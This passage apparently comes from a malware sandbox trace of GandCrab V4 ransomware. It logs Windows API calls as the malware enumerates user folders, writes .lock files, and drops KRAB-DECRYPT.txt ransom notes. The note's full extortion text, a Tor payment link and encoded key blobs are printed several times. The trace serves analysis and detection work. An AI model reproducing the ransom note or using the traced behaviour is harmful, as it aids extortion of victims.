8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.881] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.883] CloseHandle (hObject=0x320) returned 1 [0100.883] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.884] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.884] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x5b)) [0100.885] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.885] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.885] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.885] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\SendTo\\d2ca4a08d2ca4dee3d.lock") returned 47 [0100.885] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\sendto\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.897] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.897] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.898] lstrlenW (lpString="C:\\Users\\Default\\SendTo\\") returned 24 [0100.898] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\SendTo\\*") returned="C:\\Users\\Default\\SendTo\\*" [0100.898] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0100.898] CloseHandle (hObject=0x320) returned 1 [0100.898] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.898] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0100.898] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0100.898] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu" [0100.898] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Start Menu\\") returned="C:\\Users\\Default\\Start Menu\\" [0100.898] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.899] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.899] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.899] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.899] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.899] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.899] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.900] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Start Menu\\\\KRAB-DECRYPT.txt") returned 45 [0100.901] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\start menu\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.904] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.904] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.905] CloseHandle (hObject=0x320) returned 1 [0100.905] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.907] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.907] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x6a)) [0100.907] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.907] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.908] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.908] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Start Menu\\d2ca4a08d2ca4dee3d.lock") returned 51 [0100.908] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\start menu\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.932] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.933] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.933] lstrlenW (lpString="C:\\Users\\Default\\Start Menu\\") returned 28 [0100.933] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Start Menu\\*") returned="C:\\Users\\Default\\Start Menu\\*" [0100.933] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0100.933] CloseHandle (hObject=0x320) returned 1 [0100.938] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.965] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0100.965] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0100.965] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates" [0100.965] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Templates\\") returned="C:\\Users\\Default\\Templates\\" [0100.965] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.967] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.967] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.969] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Templates\\\\KRAB-DECRYPT.txt") returned 44 [0100.969] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\templates\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.977] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.977] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.979] CloseHandle (hObject=0x320) returned 1 [0100.979] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.980] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.980] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0xba)) [0100.980] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.981] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.981] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.981] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Templates\\d2ca4a08d2ca4dee3d.lock") returned 50 [0100.981] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\templates\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.983] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.983] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.984] lstrlenW (lpString="C:\\Users\\Default\\Templates\\") returned 27 [0100.984] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Templates\\*") returned="C:\\Users\\Default\\Templates\\*" [0100.984] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0100.984] CloseHandle (hObject=0x320) returned 1 [0100.984] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.984] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0100.984] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0100.984] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0100.984] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\" [0100.984] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.985] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, 